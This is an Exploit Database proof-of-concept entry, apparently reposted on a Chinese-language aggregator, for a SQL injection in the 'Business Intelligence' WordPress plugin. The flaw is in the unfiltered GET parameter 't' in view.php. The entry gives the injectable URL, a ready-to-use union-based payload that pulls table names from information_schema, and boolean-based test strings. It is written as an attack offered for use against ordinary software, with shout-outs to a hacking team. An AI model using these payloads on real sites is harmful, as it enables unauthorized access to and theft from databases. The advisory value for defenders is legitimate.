WordPress Plugin Business Intelligence – SQL Injection (Metasploit)

• Exploit Database
• 117 阅读

• 作者： Jagriti Sahu
  日期： 2015-04-02
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/36600/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67

  ################################################################################################## #Exploit Title : WordPress Plugin 'Business Intelligence' Remote SQL Injection vulnerability #Author: Jagriti Sahu AKA Incredible #Vendor Link : https://www.wpbusinessintelligence.com #Download Link : https://downloads.wordpress.org/plugin/wp-business-intelligence-lite.1.6.1.zip #Date: 1/04/2015 #Discovered at : IndiShell Lab #Love to : error1046 ^_^ ,Team IndiShell,Codebreaker ICA ,Subhi,Mrudu,Hary,Kavi ^_^ ##################################################################################################   //////////////////////// /// Overview: ////////////////////////   Wordpress plugin "Business Intelligence" is not filtering data in GET parameter' t ', which in is file 'view.php' and passing user supplied data to SQL queries' hence SQL injection vulnerability has taken place.       /////////////////////////////// // Vulnerability Description: / ///////////////////////////////   vulnerability is due to parameter " t " in file 'view.php'. user can inject sql query using GET parameter 't'     //////////////// ///POC //// ///////////////     POC Image URL---> ================= http://tinypic.com/view.php?pic=r8dyl0&s=8#.VRrvcuHRvIU     SQL Injection in parameter 't' (file 'view.php'): =================================================   Injectable Link--->http://server/wp-content/plugins/wp-business-intelligence/view.php?t=1   Union based SQL injection exist in the parameter which can be exploited as follows:     Payload used in Exploitation for Database name --->   http://server/wp-content/plugins/wp-business-intelligence/view.php ?t=1337+union+select+1,2,3,group_concat(table_name),5,6,7,8,9,10,11+from+information_schema.tables+where+table_schema=database()--+     ### EDB Note: PoC might need work depending on version of plugin. The provided software link is for the lite version. Tested with following PoC: wp-content/plugins/wp-business-intelligence-lite/view.php?t=1 and 1=1 wp-content/plugins/wp-business-intelligence-lite/view.php?t=1 and 1=2 ###     ###################################################################################################     --==[[Special Thanks to]]==--   #Manish Kishan Tanwar^_^ #